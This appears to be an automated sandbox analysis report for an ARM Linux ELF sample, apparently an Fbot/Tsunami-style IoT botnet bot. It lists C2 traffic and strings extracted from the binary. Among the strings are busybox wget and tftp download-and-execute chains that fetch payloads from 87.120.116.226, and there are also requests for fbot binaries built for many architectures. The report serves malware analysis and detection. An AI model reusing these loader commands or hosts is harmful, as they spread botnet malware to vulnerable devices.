Source: arm.elf |
ReversingLabs: Detection: 42% |
Source: global traffic |
TCP traffic: 192.168.2.13:46006 -> 85.239.34.134:7685 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 85.239.34.134 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: arm.elf |
String found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube) |
Source: arm.elf |
String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube) |
Source: global traffic |
DNS traffic detected: DNS query: daisy.ubuntu.com |
Source: arm.elf |
String found in binary or memory: http://87.120.116.226 |
Source: arm.elf |
String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY |
Source: arm.elf |
String found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox TSUNAMI |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox cat /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo |
Source: Initial sample |
String containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x2bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox |
Source: Initial sample |
String containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox wget http:// |
Source: Initial sample |
String containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox tftp -r |
Source: Initial sample |
String containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t |
Source: Initial sample |
String containing 'busybox' found: /bin/busybox echo -en ' |
Source: Initial sample |
String containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45' |
Source: Initial sample |
String containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t |
Source: Initial sample |
Potential command found: GET /fbot.arm5 HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.arm7 HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.x86 HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.mips HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.mipsel HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.powerpc HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.sparc HTTP/1.0 |
Source: Initial sample |
Potential command found: GET /fbot.sh4 HTTP/1.0 |
Source: ELF static info symbol of initial sample |
.symtab present: no |
Source: classification engine |
Classification label: mal48.linELF@0/0@2/0 |
Source: /usr/bin/dash (PID: 5416) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp |
Jump to behavior |
Source: /usr/bin/dash (PID: 5417) |
Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp |
Jump to behavior |
Source: /tmp/arm.elf (PID: 5428) |
Queries kernel information via 'uname': |
Jump to behavior |
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp |
Binary or memory string: R |U!/etc/qemu-binfmt/arm |
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp |
Binary or memory string: :Cx86_64/usr/bin/qemu-arm/tmp/arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.elf |
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmp |
Binary or memory string: /etc/qemu-binfmt/arm |
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmp |
Binary or memory string: /usr/bin/qemu-arm |